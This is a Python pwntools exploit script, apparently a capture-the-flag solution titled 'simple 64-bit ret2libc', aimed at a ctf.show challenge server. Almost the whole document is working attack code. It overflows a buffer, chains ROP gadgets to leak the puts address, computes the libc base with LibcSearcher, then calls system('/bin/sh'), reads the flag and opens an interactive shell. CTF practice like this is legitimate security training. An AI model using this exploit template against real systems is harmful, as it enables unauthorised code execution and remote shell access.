简单的64位ret2libc
from pwn import *
from LibcSearcher import *
# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28129)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.27.so")
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
r = lambda num=4096 :io.recv(num)
ru = lambda delims :io.recvuntil(delims)
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
lg = lambda address,data :log.success('%s: '%(address)+hex(data))
leak_name = "puts"
leak_plt = elf.plt[leak_name]
leak_got = elf.got[leak_name]
ret_addr = elf.symbols["ctfshow"]
ret = 0x00000000004004fe
pop_rdi = 0x0000000000400803
payload = b"a"*(0x70+8)+p64(pop_rdi)+p64(leak_got)+p64(leak_plt)+p64(ret_addr)
ru("O.o?")
sl(payload)
ru("\n")
puts_addr = uu64(r(6))
print("puts_addr------------------>: ",hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
base_addr = puts_addr-libc.dump("puts")
print("base_addr-----------------:",hex(base_addr))
system_addr = base_addr+libc.dump("system")
binsh = base_addr+libc.dump("str_bin_sh")
payload = b"a"*(0x70+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system_addr)
sl(payload)
sl("cat flag")
itr()